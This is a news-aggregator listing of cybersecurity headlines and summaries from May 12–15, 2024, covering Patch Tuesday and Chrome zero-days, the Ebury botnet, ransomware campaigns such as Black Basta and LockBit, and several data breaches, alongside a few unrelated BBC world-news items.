          Microsoft Patches 61 Flaws, Including Two Actively Exploited Zero-Days

          exploits
          2024-05-15 https://thehackernews.com/2024/05/microsoft-patches-61-flaws-including.html
          Microsoft has addressed a total of 61 new security flaws in its software as part of its Patch Tuesday updates for May 2024, including two zero-days which have been actively exploited in the wild. Of the 61 flaws, one is rated Critical, 59 are rated Important, and one is rated Moderate in severity. This is in addition to 30 vulnerabilities "

          Autosummary: Other notable flaws encompass privilege escalation flaws in the Common Log File System (CLFS) driver – CVE-2024-29996, CVE-2024-30025 (CVSS scores: 7.8), and CVE-2024-30037 (CVSS score: 7.5) – Win32k (CVE-2024-30028 and CVE-2024-30030, CVSS scores: 7.8), Windows Search Service (CVE-2024-30033, CVSS score: 7.0), and Windows Kernel (CVE-2024-30018, CVSS score: 7.8). "


          Ransomware attack on Singing River Health System impacted 895,000 people

          exploits
          2024-05-15 https://securityaffairs.com/163183/data-breach/singing-river-health-system-data-breach.html
          The Singing River Health System revealed that the ransomware attack that hit the organization in August 2023 impacted 895,204 people. At the end of August 2023, the systems at three hospitals and other medical facilities operated by Singing River Health System (SRHS) were hit by a Rhysida ransomware attack. The Singing River Health System runs […] "

          Autosummary: Potentially compromised information includes name, date of birth, address, Social Security number, medical information, and health insurance information. "


          Ebury Botnet Malware Compromises 400,000 Linux Servers Over Past 14 Years

          exploits Linux
          2024-05-15 https://thehackernews.com/2024/05/ebury-botnet-malware-compromises-400000.html
          A malware botnet called Ebury is estimated to have compromised 400,000 Linux servers since 2009, out of which more than 100,000 were still compromised as of late 2023. The findings come from Slovak cybersecurity firm ESET, which characterized it as one of the most advanced server-side malware campaigns for financial gain. "Ebury actors have been pursuing monetization activities [...], "

          Autosummary: " ESET"s investigation has unearthed various methods the attackers use to deliver Ebury, including methods such as theft of SSH credentials, credential stuffing, infiltrating hosting provider infrastructure, exploitation of flaws in Control Web Panel (e.g., CVE-2021-45467), and SSH adversary-in-the-middle (AitM) attacks. "


          Dutch Court Sentences Tornado Cash Co-Founder to 5 Years in Prison for Money Laundering

          financial
          2024-05-15 https://thehackernews.com/2024/05/dutch-court-sentences-tornado-cash-co.html
          A Dutch court on Tuesday sentenced one of the co-founders of the now-sanctioned Tornado Cash cryptocurrency mixer service to 5 years and 4 months in prison. While the name of the defendant was redacted in the verdict, it’s known that Alexey Pertsev, a 31-year-old Russian national, has been awaiting trial in the Netherlands on money laundering charges. "

          Autosummary: A year later, the U.S. Department of Justice indicted two of its other founders, Roman Storm and Roman Semenov, charging them with conspiracy to commit money laundering, conspiracy to commit sanctions violations, and conspiracy to operate an unlicensed money-transmitting business. "


          Banco Santander warns of a data breach exposing customer info

          financial bancosmx
          2024-05-15 https://www.bleepingcomputer.com/news/security/banco-santander-warns-of-a-data-breach-exposing-customer-info/
          Banco Santander S.A. announced it suffered a data breach impacting customers after an unauthorized actor accessed a database hosted by one of its third-party service providers. [...] "



          How attackers deliver malware to Foxit PDF Reader users

          exploits
          2024-05-15 https://www.helpnetsecurity.com/2024/05/15/foxit-pdf-malware/

          Threat actors are taking advantage of the flawed design of Foxit PDF Reader’s alerts to deliver malware via booby-trapped PDF documents, Check Point researchers have warned. Exploiting the issue: The researchers have analyzed several campaigns using malicious PDF files that are targeting Foxit Reader users. The attackers are leveraging a variety of .NET and Python exploit builders, the most popular of which is the “PDF Exploit Builder”, to create PDF documents with macros that execute … More

          The post How attackers deliver malware to Foxit PDF Reader users appeared first on Help Net Security.

          "

          Autosummary: The attackers are leveraging a variety of .NET and Python exploit builders, the most popular of which is the “PDF Exploit Builder”, to create PDF documents with macros that execute commands/scripts that download and execute malware (Agent Tesla, Remcos RAT, Xworm, NanoCore RAT, and others). "


          Android 15, Google Play get new anti-malware and anti-fraud features

          exploits
          2024-05-15 https://www.bleepingcomputer.com/news/google/android-15-google-play-get-new-anti-malware-and-anti-fraud-features/
          Today, Google announced new security features coming to Android 15 and Google Play that will help block scams, fraud, and malware apps on users’ devices. [...] "

          Autosummary: "Today, we’re announcing more new fraud and scam protection features coming in Android 15 and Google Play services updates later this year to help better protect users around the world," reads a Google blog post from Dave Kleidermacher, VP Engineering, Android Security and Privacy. The API has now been updated to allow developers to check the following in-app signals: Risk From Screen Capturing or Remote Access: Developers can check if there are other apps running that could be capturing the screen, creating overlays, or controlling the device. "


          Nissan North America data breach impacts over 53,000 employees

          financial
          2024-05-15 https://www.bleepingcomputer.com/news/security/nissan-north-america-data-breach-impacts-over-53-000-employees/
          Nissan North America (Nissan) suffered a data breach last year when a threat actor targeted the company’s external VPN and shut down systems to receive a ransom. [...] "

          Autosummary: " In a data breach notification to the Office of the Maine Attorney General, the company states that the exposed details included a personal identifier (e.g. name) and social security numbers, and that financial details were not present in the files accessed by the threat actor. "


          Windows Quick Assist abused in Black Basta ransomware attacks

          exploits ransomware
          2024-05-15 https://www.bleepingcomputer.com/news/security/windows-quick-assist-abused-in-black-basta-ransomware-attacks/
          Financially motivated cybercriminals abuse the Windows Quick Assist feature in social engineering attacks to deploy Black Basta ransomware payloads on victims’ networks. [...] "

          Autosummary: Since then, its affiliates have breached many high-profile victims, including German defense contractor Rheinmetall, U.K. technology outsourcing company Capita, Hyundai’s European division, the Toronto Public Library, the American Dental Association, industrial automation company and government contractor ABB, Sobeys, Knauf, and Yellow Pages Canada. "


          Android 15 Rolls Out Advanced Features to Protect Users from Scams and Malicious Apps

          financial
          2024-05-15 https://thehackernews.com/2024/05/android-15-introduces-new-features-to.html
          Google is unveiling a set of new features in Android 15 to prevent malicious apps installed on the device from capturing sensitive data. This constitutes an update to the Play Integrity API that third-party app developers can take advantage of to secure their applications against malware. "Developers can check if there are other apps running that could be capturing the screen, creating "

          Autosummary: "Developers can check if there are other apps running that could be capturing the screen, creating overlays, or controlling the device," Dave Kleidermacher, vice president of engineering for Android security and privacy, said. "


          Google patches third exploited Chrome zero-day in a week

          exploits
          2024-05-15 https://www.bleepingcomputer.com/news/google/google-patches-third-exploited-chrome-zero-day-in-a-week/
          Google has released a new emergency Chrome security update to address the third zero-day vulnerability exploited in attacks within a week. [...] "



          Smashing Security podcast #372: The fake deepfake, and Estate insecurity

          government
          2024-05-15 https://grahamcluley.com/smashing-security-podcast-372/
          Remember when a US mother was accused of distributing explicit deepfake photos and videos to try to get her teenage daughter’s cheerleading rivals kicked off the team? Well, there has been a surprising development. And learn how cybercriminals have been stealing boomers’ one-time-passcodes via a secretive online service. All this and more is discussed in the latest edition of the award-winning "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. "

          Autosummary: Hosts: Graham Cluley (@gcluley), Carole Theriault (@caroletheriault). Episode links: Sponsored by Kiteworks – Step into the future of secure managed file transfer with Kiteworks. "


          Android 15, Google Play Protect get new anti-malware and anti-fraud features

          exploits
          2024-05-15 https://www.bleepingcomputer.com/news/google/android-15-google-play-protect-get-new-anti-malware-and-anti-fraud-features/
          Today, Google announced new security features coming to Android 15 and Google Play Protect that will help block scams, fraud, and malware apps on users’ devices. [...] "

          Autosummary: "Today, we’re announcing more new fraud and scam protection features coming in Android 15 and Google Play services updates later this year to help better protect users around the world," reads a Google blog post from Dave Kleidermacher, VP Engineering, Android Security and Privacy. The API has now been updated to allow developers to check the following in-app signals: Risk From Screen Capturing or Remote Access: Developers can check if there are other apps running that could be capturing the screen, creating overlays, or controlling the device. "


          Google fixes third actively exploited Chrome zero-day in a week

          exploits
          2024-05-15 https://www.bleepingcomputer.com/news/google/google-fixes-CVE-2024-4947-third-actively-exploited-chrome-zero-day-in-a-week/
          Google has released a new emergency Chrome security update to address the third zero-day vulnerability exploited in attacks within a week. [...] "

          Autosummary: The other two actively exploited Chrome zero-days patched this week are CVE-2024-4671 (a use-after-free flaw in the Visuals component) and CVE-2024-4761 (an out-of-bounds write bug in the V8 JavaScript engine). "


          Tailoring responsible AI: Defining ethical guidelines for industry-specific use

          industry
          2024-05-14 https://www.helpnetsecurity.com/2024/05/14/chris-peake-smartsheet-responsible-ai/

          In this Help Net Security interview, Chris Peake, CISO & SVP at Smartsheet, explains how responsible AI should be defined by each organization to guide their AI development and usage. Peake emphasizes that implementing responsible AI requires balancing ethical considerations, industry regulations, and proactive risk assessment to ensure that AI is used transparently. How should businesses and governments implement responsible AI to ensure ethical alignment, particularly in industries heavily reliant on AI? Responsible AI can … More

          The post Tailoring responsible AI: Defining ethical guidelines for industry-specific use appeared first on Help Net Security.

          "

          Autosummary: This includes: publicly sharing your AI principles; acknowledging the challenges you expect to encounter as you develop your AI systems; training your employees how to comply with the principles and use AI in a responsible way; and publicly sharing exactly how your company’s AI systems work. Once you’ve taken these steps, you can start aligning AI with products and services to drive better results responsibly. Since generative AI is still relatively new and evolving, I like to take a scientific approach to this process, including documenting the facts we know today, what we expect in the future, and the subsequent outcomes. Security, IT, and governance teams, in particular, must anticipate how AI abuse can impact their organizations. "


          Log4J shows no sign of fading, spotted in 30% of CVE exploits

          exploits
          2024-05-14 https://www.helpnetsecurity.com/2024/05/14/log4j-wan-insecure-protocols/

          Organizations continue to run insecure protocols across their wide area networks (WAN), making it easier for cybercriminals to move across networks, according to a Cato Networks survey. Enterprises are too trusting within their networks. The Cato CTRL SASE Threat Report Q1 2024 provides insight into the security threats and their identifying network characteristics for all aggregate traffic—regardless of whether they emanate from or are destined for the internet or the WAN—and for all endpoints across … More

          The post Log4J shows no sign of fading, spotted in 30% of CVE exploits appeared first on Help Net Security.

          "

          Autosummary: “As threat actors constantly introduce new tools, techniques, and procedures targeting organizations across all industries, cyber threat intelligence remains fragmented and isolated to point solutions,” said Etay Maor, Chief Security Strategist at Cato Networks. "


          Google Chrome emergency update fixes 6th zero-day exploited in 2024

          exploits
          2024-05-14 https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-6th-zero-day-exploited-in-2024/
          Google has released emergency security updates for the Chrome browser to address a high-severity zero-day vulnerability tagged as exploited in attacks. [...] "

          Autosummary: This fix comes only three days after Google addressed another zero-day vulnerability in Chrome, CVE-2024-4671, caused by a use-after-free weakness in the Visuals component. "


          Phorpiex botnet sent millions of phishing emails to deliver LockBit Black ransomware

          financial exploits ransomware
          2024-05-14 https://securityaffairs.com/163109/malware/phorpiex-botnet-lockbit-black-ransomware.html
Experts reported that since April, the Phorpiex botnet has sent millions of phishing emails to spread LockBit Black ransomware. New Jersey’s Cybersecurity and Communications Integration Cell (NJCCIC) reported that since April, threat actors have used the Phorpiex botnet to send millions of phishing emails as part of a LockBit Black ransomware campaign. The botnet has been active […] "

Autosummary: The botnet has been active since at least 2016; in the past it was involved in sextortion spam campaigns, crypto-jacking, cryptocurrency clipping (substituting the original wallet address saved in the clipboard with the attacker’s wallet address during a transaction) and ransomware attacks. In August 2021 the criminal organization behind the Phorpiex botnet shut down its operations and put the source code of the bot up for sale on a dark web cybercrime forum. "


          Black Basta ransomware group’s techniques evolve, as FBI issues new warning in wake of hospital attack

          exploits ransomware
          2024-05-14 https://www.exponential-e.com/blog/black-basta-ransomware-groups-techniques-evolve-as-fbi-issues-new-warning-in-wake-of-hospital-attack
          Security agencies in the United States have issued a new warning about the Black Basta ransomware group, in the wake of a high-profile attack against the healthcare giant Ascension. The cyber attack last week forced the Ascension computer systems offline, and caused some hospital emergency departments to turn away ambulances "in order to ensure emergency cases are triaged immediately." Read more in my article on the Exponential-e blog. "



          Google fixes sixth actively exploited Chrome zero-day this year

          exploits
          2024-05-14 https://securityaffairs.com/163136/hacking/6th-chrome-zero-day-2024.html
Google released emergency security updates to address an actively exploited Chrome zero-day vulnerability. Google has released emergency security updates to address a high-severity zero-day vulnerability, tracked as CVE-2024-4761, in the Chrome browser. The vulnerability is an out-of-bounds write issue that resides in the V8 JavaScript engine of the Google web browser. The company confirmed […] "

Autosummary: Pierluigi Paganini, May 14, 2024. Google released emergency security updates to address an actively exploited Chrome zero-day vulnerability. (March 2024) CVE-2024-4671: a use-after-free issue that resides in the Visuals component (May 2024). "


          Apple fixes Safari WebKit zero-day flaw exploited at Pwn2Own

          exploits
          2024-05-14 https://www.bleepingcomputer.com/news/apple/apple-fixes-safari-webkit-zero-day-flaw-exploited-at-pwn2own/
Apple has released security updates to fix a zero-day vulnerability in the Safari web browser exploited during this year's Pwn2Own Vancouver hacking competition. [...] "



          VMware fixes three zero-day bugs exploited at Pwn2Own 2024

          exploits
          2024-05-14 https://www.bleepingcomputer.com/news/security/vmware-fixes-three-zero-day-bugs-exploited-at-pwn2own-2024/
          VMware fixed four security vulnerabilities in the Workstation and Fusion desktop hypervisors, including three zero-days exploited during the Pwn2Own Vancouver 2024 hacking contest. [...] "

Autosummary: Pwn2Own Vancouver 2024 results. Security researchers collected $1,132,500 after demoing 29 zero-days (and some bug collisions) at this year's Vancouver hacking competition, with Manfred Paul emerging as the winner and earning $202,500 in cash after taking down the Apple Safari, Google Chrome, and Microsoft Edge web browsers. "


          Apple backports iOS zero-day patch, adds Bluetooth tracker alert

          exploits
          2024-05-14 https://www.helpnetsecurity.com/2024/05/14/ios-bluetooth-tracker-alert/

Apple has backported the patch for CVE-2024-23296 to the iOS 16 branch and has fixed a bug (CVE-2024-27852) in MarketplaceKit that may allow maliciously crafted webpages to distribute a script that tracks iOS users on other webpages. The company has also added a new capability to iOS 17 that will alert users if an unknown Bluetooth tracker is “seen” moving with them. Patched vulnerabilities. Apple released security updates for iOS and iPadOS, macOS, Safari, tvOS … More

          "

          Autosummary: The fix for the RTKit zero-day (CVE-2024-23296) – which has been patched in iOS and iPadOS 17.4, macOS Sonoma, watchOS, tvOS and visionOS in March 2024 after reports of in-the-wild exploitation – has been backported only to Ventura, iOS 16.7.8 and iPadOS 16.7.8 (for now). "


          New Chrome Zero-Day Vulnerability CVE-2024-4761 Under Active Exploitation

          exploits
          2024-05-14 https://thehackernews.com/2024/05/new-chrome-zero-day-vulnerability-cve.html
          Google on Monday shipped emergency fixes to address a new zero-day flaw in the Chrome web browser that has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2024-4761, is an out-of-bounds write bug impacting the V8 JavaScript and WebAssembly engine. It was reported anonymously on May 9, 2024. Out-of-bounds write bugs could be typically "



          Police injured in protest over Mexico missing students

          latam
          2024-05-14 https://www.bbc.com/news/articles/c29661nl3edo
          Protesters angry at the lack of progress in the case of the 43 missing students threw firecrackers. "



Africa's internet vulnerability and how to fix it

          exploits
          2024-05-14 https://www.bbc.com/news/articles/cjr77zj8lj4o
The internet outage in East Africa highlights the fragility of the continent's online connections. "



          Singing River Health System: Data of 895,000 stolen in ransomware attack

          exploits ransomware
          2024-05-14 https://www.bleepingcomputer.com/news/security/singing-river-health-system-data-of-895-000-stolen-in-ransomware-attack/
          The Singing River Health System is warning that it is now estimating that 895,204 people are impacted by a ransomware attack it suffered in August 2023. [...] "



          Microsoft fixes Windows Server bug causing crashes, NTLM auth failures

          exploits
          2024-05-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-server-bug-causing-crashes-ntlm-auth-failures/
Microsoft has fixed a known issue causing NTLM authentication failures and domain controller reboots after installing last month's Windows Server security updates. [...] "

          Autosummary: The list of impacted Windows versions and the cumulative updates that fix the known issue includes: Windows Server 2022 (KB5037782), Windows Server 2019 (KB5037765), Windows Server 2016 (KB5037763), Windows Server 2012 R2 (KB5037823), Windows Server 2012 (KB5037778), Windows Server 2008 R2 (KB5037780), and Windows Server 2008 SP2 (KB5037800). "


          Microsoft fixes Windows zero-day exploited in QakBot malware attacks

          exploits
          2024-05-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-zero-day-exploited-in-qakbot-malware-attacks/
Microsoft has fixed a zero-day vulnerability exploited in attacks to deliver QakBot and other malware payloads on vulnerable Windows systems. [...] "

          Autosummary: Throughout the years, Qakbot served as an initial infection vector for various ransomware gangs and their affiliates, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta. "


          Microsoft May 2024 Patch Tuesday fixes 3 zero-days, 61 flaws

          exploits
          2024-05-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2024-patch-tuesday-fixes-3-zero-days-61-flaws/
Today is Microsoft's May 2024 Patch Tuesday, which includes security updates for 61 flaws and three actively exploited or publicly disclosed zero-days. [...] "

Autosummary: The number of bugs in each vulnerability category is listed below: 17 Elevation of Privilege Vulnerabilities; 2 Security Feature Bypass Vulnerabilities; 27 Remote Code Execution Vulnerabilities; 7 Information Disclosure Vulnerabilities; 3 Denial of Service Vulnerabilities; 4 "


          Ebury botnet malware infected 400,000 Linux servers since 2009

          exploits Linux
          2024-05-14 https://www.bleepingcomputer.com/news/security/ebury-botnet-malware-infected-400-000-linux-servers-since-2009/
          A malware botnet known as "Ebury" has infected almost 400,000 Linux servers since 2009, with roughly 100,000 still compromised as of late 2023. [...] "

Autosummary: The monetization strategies vary, though, and they also include stealing credit card information entered into payment sites, redirecting web traffic to generate revenue from ads and affiliate programs, using compromised servers to send spam, and selling the captured credentials. The malware modules spread via the Ebury botnet, based on ESET's latest observations, are: HelimodProxy: proxies raw traffic and relays spam by modifying the mod_dir.so Apache module, allowing the compromised server to run arbitrary commands and support spam campaigns. "


          May 2024 Patch Tuesday: Microsoft fixes exploited zero-days (CVE-2024-30051, CVE-2024-30040)

          exploits
          2024-05-14 https://www.helpnetsecurity.com/2024/05/14/patch-tuesday-cve-2024-30051-cve-2024-30040/

For May 2024 Patch Tuesday, Microsoft has released fixes for 59 CVE-numbered vulnerabilities, including two zero-days (CVE-2024-30051, CVE-2024-30040) actively exploited by attackers. CVE-2024-30051 and CVE-2024-30040. CVE-2024-30051 is a heap-based buffer overflow vulnerability affecting the Windows DWM Core Library that can be exploited to elevate attackers’ privileges on a target system. “An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,” Microsoft says. Researchers from Kaspersky, DBAPPSecurity WeBin Lab, Google Threat Analysis Group and Google … More

          "

Autosummary: Other vulnerabilities of note. Satnam Narang, senior staff research engineer at Tenable, says that exploitation of CVE-2024-30044, the only critical vulnerability fixed this month, requires an attacker to be authenticated to a vulnerable SharePoint Server with Site Owner permissions (or higher) first and then take additional steps, “which makes this flaw less likely to be widely exploited as most attackers follow the path of least resistance.” "


          VMware fixed zero-day flaws demonstrated at Pwn2Own Vancouver 2024

          exploits
          2024-05-14 https://securityaffairs.com/163152/hacking/vmware-fixed-zero-days-demonstrated-pwn2own2024.html
VMware fixed four flaws in its Workstation and Fusion desktop hypervisors, including three zero-days exploited at Pwn2Own Vancouver 2024. VMware addressed four vulnerabilities in its Workstation and Fusion desktop hypervisors, including three zero-day flaws demonstrated at Pwn2Own Vancouver 2024. Below are descriptions of the flaws addressed by the virtualization giant. The vendor also […] "

Autosummary: Pierluigi Paganini, May 14, 2024. VMware fixed four flaws in its Workstation and Fusion desktop hypervisors, including three zero-days exploited at Pwn2Own Vancouver 2024. VMware addressed four vulnerabilities in its Workstation and Fusion desktop hypervisors, including three zero-day flaws demonstrated at Pwn2Own Vancouver 2024. "


          Rowers give up Olympic dream to help Brazil flood victims

          latam
          2024-05-14 https://www.bbc.co.uk/news/world-latin-america-69009075
          The athletes decided to stay in their home state of Rio Grande do Sul to help flood victims. "



          PoC exploit released for RCE zero-day in D-Link EXO AX4800 routers

          exploits
          2024-05-14 https://www.bleepingcomputer.com/news/security/poc-exploit-released-for-rce-zero-day-in-d-link-exo-ax4800-routers/
          The D-Link EXO AX4800 (DIR-X4860) router is vulnerable to remote unauthenticated command execution that could lead to complete device takeovers by attackers with access to the HNAP port. [...] "

          Autosummary: The D-Link DIR-X4860 router is a high-performance Wi-Fi 6 router capable of speeds of up to 4800 Mbps and advanced features like OFDMA, MU-MIMO, and BSS Coloring that enhance efficiency and reduce interference. "


          Microsoft Patch Tuesday security updates for May 2024 fixes 2 actively exploited zero-days

          exploits
          2024-05-14 https://securityaffairs.com/163172/security/microsoft-patch-tuesday-may-2024.html
          Microsoft Patch Tuesday security updates for May 2024 fixed 59 flaws across various products including an actively exploited zero-day. Microsoft Patch Tuesday security updates for May 2024 addressed 59 vulnerabilities in Windows and Windows Components; Office and Office Components; .NET Framework and Visual Studio; Microsoft Dynamics 365; Power BI; DHCP Server; Microsoft Edge (Chromium-based); and […] "



          How AI turned a Ukrainian YouTuber into a Russian

          rusia-ucrania
          2024-05-14 https://www.bbc.com/news/articles/c25rre8ww57o
          As generative AI develops so quickly, regulating it and protecting people has become a challenge. "



          Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain

          financial Linux
          2024-05-14 https://www.welivesecurity.com/en/eset-research/ebury-alive-unseen-400k-linux-servers-compromised-cryptotheft-financial-gain/
          One of the most advanced server-side malware campaigns is still growing, with hundreds of thousands of compromised servers, and it has diversified to include credit card and cryptocurrency theft "

Autosummary: One of the most advanced server-side malware campaigns is still growing, with hundreds of thousands of compromised servers, and it has diversified to include credit card and cryptocurrency theft. Ten years ago we raised awareness of Ebury by publishing a white paper we called Operation Windigo, which documented a campaign that leveraged Linux malware for financial gain. The new paper, Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain, goes into more detail about each of Ebury’s aspects, including many technical specifics. "


          How AI affects vulnerability management in open-source software

          exploits
          2024-05-13 https://www.helpnetsecurity.com/2024/05/13/ai-affects-open-source-vulnerability-management-video/

          In this Help Net Security video, Itamar Sher, CEO of Seal Security, discusses how AI affects the risk and operational aspects of managing vulnerabilities in open-source software. One of the core issues around open-source vulnerability patch management has been the coupling between security patches and other code changes. The result is that developers cannot apply security patches immediately, as they risk breaking their code because of changes unrelated to security fixes. This causes a significant … More

          "



          Securing the future through cybersecurity education

          ciber
          2024-05-13 https://www.helpnetsecurity.com/2024/05/13/cybersecurity-talent-shortage-education-video/

In this Help Net Security round-up, we present excerpts from previously recorded videos in which security experts talk about the cybersecurity talent shortage and the role STEM education can play in solving that problem. They also discuss actions needed to improve cybersecurity education. Complete videos. Avani Desai, CEO at Schellman, talks about how teaching STEM subjects like cybersecurity is essential for addressing the staffing crisis and ensuring that organizations have the talent to protect themselves … More

          "



          Australian Firstmac Limited disclosed a data breach after cyber attack

          financial
          2024-05-13 https://securityaffairs.com/163064/data-breach/firstmac-limited-disclosed-data-breach.html
Firstmac Limited disclosed a data breach after the new Embargo extortion group leaked over 500GB of data allegedly stolen from the company. Firstmac Limited, one of the largest non-bank lenders in Australia, disclosed a data breach. Firstmac Limited is an Australian-owned company with experience in home and investment loans. They have a range of market […] "

Autosummary: Disclosure notices for the @FirstmacLimited ransomware incident appear to have now gone out: pic.twitter.com/e2SWoRJRTw — Troy Hunt (@troyhunt) May 10, 2024. Exposed personal information includes: name; contact information (residential address, email address and/or phone number). "


          Black Basta Ransomware Strikes 500+ Entities Across North America, Europe, and Australia

          exploits ransomware
          2024-05-13 https://thehackernews.com/2024/05/black-basta-ransomware-strikes-500.html
          The Black Basta ransomware-as-a-service (RaaS) operation has targeted more than 500 private industry and critical infrastructure entities in North America, Europe, and Australia since its emergence in April 2022. In a joint advisory published by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS "

Autosummary: Some of the other new ransomware groups that made their appearance in recent weeks comprise APT73, DoNex, DragonForce, Hunt (a Dharma/Crysis ransomware variant), KageNoHitobito, Megazord, Qiulong, Rincrypt, and Shinra. A new analysis by NCC Group's Fox-IT team has revealed that 3,143 servers are still at risk of CVE-2023-48365 (aka DoubleQlik), with a majority of them located in the U.S., Italy, Brazil, the Netherlands, and Germany as of April 17, 2024. "


          River levels rise in flood-hit Brazilian state

          latam government
          2024-05-13 https://www.bbc.com/news/articles/c2899kjv7zeo
          Alerts have been issued in areas already ravaged by floodwaters as more devastation looms. "



          Helsinki suffers data breach after hackers exploit unpatched flaw

          financial exploits
          2024-05-13 https://www.bleepingcomputer.com/news/security/helsinki-suffers-data-breach-after-hackers-exploit-unpatched-flaw/
          The City of Helsinki is investigating a data breach in its education division, which it discovered in late April 2024, impacting tens of thousands of students, guardians, and personnel. [...] "

Autosummary: Additionally, the exposed drive contained information about fees, childhood education and care, children's status, welfare requests, medical certificates, and other highly sensitive information. "


          Russian hackers defaced local British news sites

          rusia-ucrania
          2024-05-13 https://securityaffairs.com/163080/cyber-crime/russian-hackers-british-newspaper-websites.html
          A group of hackers that defines itself as “first-class Russian hackers” claims the defacement of hundreds of local and regional British newspaper websites. A group claiming to be “first-class Russian hackers” defaced numerous local and regional British newspaper websites owned by Newsquest Media Group. The group defaced the home pages of the targeted websites and […] "

          Autosummary: “The operations have primarily targeted audiences in Lithuania, Latvia, and Poland with anti-North Atlantic Treaty Organization (NATO) narratives, often leveraging website compromises or spoofed email accounts to disseminate fabricated content, including falsified correspondence from military officials” reads the report published by FireEye. "


          Botnet sent millions of emails in LockBit Black ransomware campaign

          exploits ransomware
          2024-05-13 https://www.bleepingcomputer.com/news/security/botnet-sent-millions-of-emails-in-lockbit-black-ransomware-campaign/
          Since April, millions of phishing emails have been sent through the Phorpiex botnet to conduct a large-scale LockBit Black ransomware campaign. [...] "

          Autosummary: These phishing emails with "your document" and "photo of you???" subject lines are being sent using "Jenny Brown" or "Jenny Green" aliases from over 1,500 unique IP addresses worldwide, including Kazakhstan, Uzbekistan, Iran, Russia, and China. "


          Prison for cybersecurity expert selling private videos from inside 400,000 homes

          ciber
          2024-05-13 https://www.bitdefender.com/blog/hotforsecurity/prison-for-cybersecurity-expert-selling-private-videos-from-inside-400-000-homes/
          A Korean cybersecurity expert has been sentenced to prison for illegally accessing and distributing private photos and videos from vulnerable "wallpad" cameras in 400,000 private households. Read more in my article on the Hot for Security blog. "



          City of Helsinki suffered a data breach

          financial government
          2024-05-13 https://securityaffairs.com/163088/data-breach/city-of-helsinki-data-breach.html
The City of Helsinki suffered a data breach that impacted tens of thousands of students, guardians, and personnel. The Police of Finland is investigating a data breach suffered by the City of Helsinki; the security breach occurred during the night of 30 April 2024. The data breach impacted the City’s Education Division’s computer network. The […] "

Autosummary: Pierluigi Paganini, May 13, 2024. The City of Helsinki suffered a data breach that impacted tens of thousands of students, guardians, and personnel. “These include information about fees (and the grounds thereof) for customers of early childhood education and care, sensitive information about the status of children, such as information requests by student welfare or information about the need of special support and medical certificates regarding the suspension of studies for upper secondary students, as well as the sick leave records of Education Division personnel.” "


          Apple backports fix for RTKit iOS zero-day to older iPhones

          exploits
          2024-05-13 https://www.bleepingcomputer.com/news/apple/apple-backports-fix-for-rtkit-ios-zero-day-to-older-iphones/
          Apple has backported security patches released in March to older iPhones and iPads, fixing an iOS Kernel zero-day tagged as exploited in attacks. [...] "



          INC ransomware source code selling on hacking forums for $300,000

          exploits ransomware
          2024-05-13 https://www.bleepingcomputer.com/news/security/inc-ransomware-source-code-selling-on-hacking-forums-for-300-000/
          A cybercriminal using the name "salfetka" claims to be selling the source code of INC Ransom, a ransomware-as-a-service (RaaS) operation launched in August 2023. [...] "

Autosummary: INC Ransom moving to a new site. On May 1, 2024, INC Ransom announced on its old leak site that it would move to a new data leak extortion "blog" and shared a new TOR address, stating the old site would be closed in two to three months. "


          Threat actors may have exploited a zero-day in older iPhones, Apple warns

          exploits
          2024-05-13 https://securityaffairs.com/163096/hacking/apple-iphones-zero-day-exploited.html
Apple rolled out urgent security updates to address code execution vulnerabilities in iPhones, iPads, and macOS. Apple released urgent security updates to address multiple vulnerabilities in iPhones, iPads, and macOS. The company also warns of a vulnerability patched in March that the company believes may have been exploited as a zero-day. The issue impacts older iPhone […] "



Cow dung's key role in India's energy industry

          industry
          2024-05-13 https://www.bbc.com/news/articles/c254ggrry45o
          India is hoping that biogas, produced from farm waste, will curb its reliance on imported gas. "



          Apple backports fix for zero-day exploited in attacks to older iPhones

          exploits
          2024-05-13 https://www.bleepingcomputer.com/news/apple/apple-backports-fix-for-zero-day-exploited-in-attacks-to-older-iphones/
          Apple has backported security patches released in March to older iPhones and iPads, fixing an iOS zero-day tagged as exploited in attacks. [...] "



          As of May 2024, Black Basta ransomware affiliates hacked over 500 organizations worldwide

          exploits ransomware
          2024-05-12 https://securityaffairs.com/163019/cyber-crime/black-basta-ransomware-500-organizations.html
          Black Basta ransomware affiliates have breached over 500 organizations between April 2022 and May 2024, FBI and CISA reported. The FBI, CISA, HHS, and MS-ISAC have issued a joint Cybersecurity Advisory (CSA) regarding the Black Basta ransomware activity as part of the StopRansomware initiative. Black Basta has targeted at least 12 critical infrastructure sectors, including […] "

Autosummary: Pierluigi Paganini, May 12, 2024. Black Basta ransomware affiliates have breached over 500 organizations between April 2022 and May 2024, FBI and CISA reported. "


          Pro-Russia hackers targeted Kosovo’s government websites

          government
          2024-05-12 https://securityaffairs.com/163041/hacking/pro-russia-hackers-targeted-kosovo.html
          Pro-Russia hackers targeted government websites in Kosovo in retaliation for the government’s support to Ukraine with military equipment. Pro-Russia hackers targeted Kosovo government websites, including the websites of the president and prime minister, with DDoS attacks. The attacks are a retaliation for Kosovo’s support of Ukraine with military equipment. Defense Minister Ejup Maqedonci claimed that […] "

Autosummary: The pro-Russia Killnet group launched multiple DDoS attacks against governments that expressed support for Ukraine, including Moldova, Italy, Romania, the Czech Republic, Lithuania, Norway, and Latvia. "


          Largest non-bank lender in Australia warns of a data breach

          financial
          2024-05-12 https://www.bleepingcomputer.com/news/security/largest-non-bank-lender-in-australia-warns-of-a-data-breach/
          Firstmac Limited is warning customers that it suffered a data breach a day after the new Embargo cyber-extortion group leaked over 500GB of data allegedly stolen from the firm. [...] "



          Peru president’s brother held in corruption probe

          latam
          2024-05-11 https://www.bbc.com/news/articles/c0w0kvvk6k1o
Nicanor Boluarte’s arrest comes weeks after President Dina Boluarte's home was raided over corruption allegations. "



          Brazil floods drive thousands from their homes

          latam
          2024-05-11 https://www.bbc.co.uk/news/world-latin-america-68979430
